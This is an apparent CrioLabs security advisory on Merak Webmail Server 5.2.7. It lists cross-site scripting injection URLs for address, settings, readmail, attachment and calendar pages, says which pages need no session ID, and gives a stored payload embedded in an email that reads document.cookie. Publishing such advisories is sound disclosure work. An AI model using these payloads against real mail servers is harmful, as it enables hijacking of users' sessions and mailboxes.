****************************************************************************************************
CRIOLABS
http://www.criolabs.net
- Software: Merak Webmail Server
- Type: Webmail
- Company: Merak Mail Server, Inc.
****************************************************************************************************
## Software ##
Software: Merak Webmail Server
Version: 5.2.7
Plataforms: All Windows platforms
Web: http://www.merakmailserver.com/
## Vendor Description ##
Merak's WebMail Server is used by thousands of companies around the world to provide secure (ssl) anytime-anywhere access to home, office or ISP email via a browser or WAP-enabled device.
In less than 10 minutes you can have the same professional email server that organizations such as NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and Developers depend on every day.
## Vulnerabilities ##
Cross-Site Scripting, Full path disclosure, Exposure of PHP files, SQL-Injection.
## Cross-Site Scripting ##
There are a lot of Input Validation Holes in this soft. An attacker can perform an XSS attack and be able to access the target user's cookies.
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=">&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=
/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
/readmail.html?id=[id]&folder=">[XSS]
The next files (attachment.html,calendar.html), can be executed without knowing user's session ID number.
/attachment.html?attachmentpage_text_error=">[XSS]
/calendar.html?id=1&schedule=admin%40merakdemo.com&cv=n&folder=
/calendar.html?id=1&schedule=koko%40merakdemo.com&sf=addevent&cv=d&ct=">[XSS]
/calendar.html?id=[id]&cv=">[XSS]&ct=[ct]&sf=addevent&ESdhour=8
Also it is possible to inject a XSS in the message directly, example:
Open your mail and write a new message like this :
#Image 1.jpg
![](javascript:alert(document.cookie))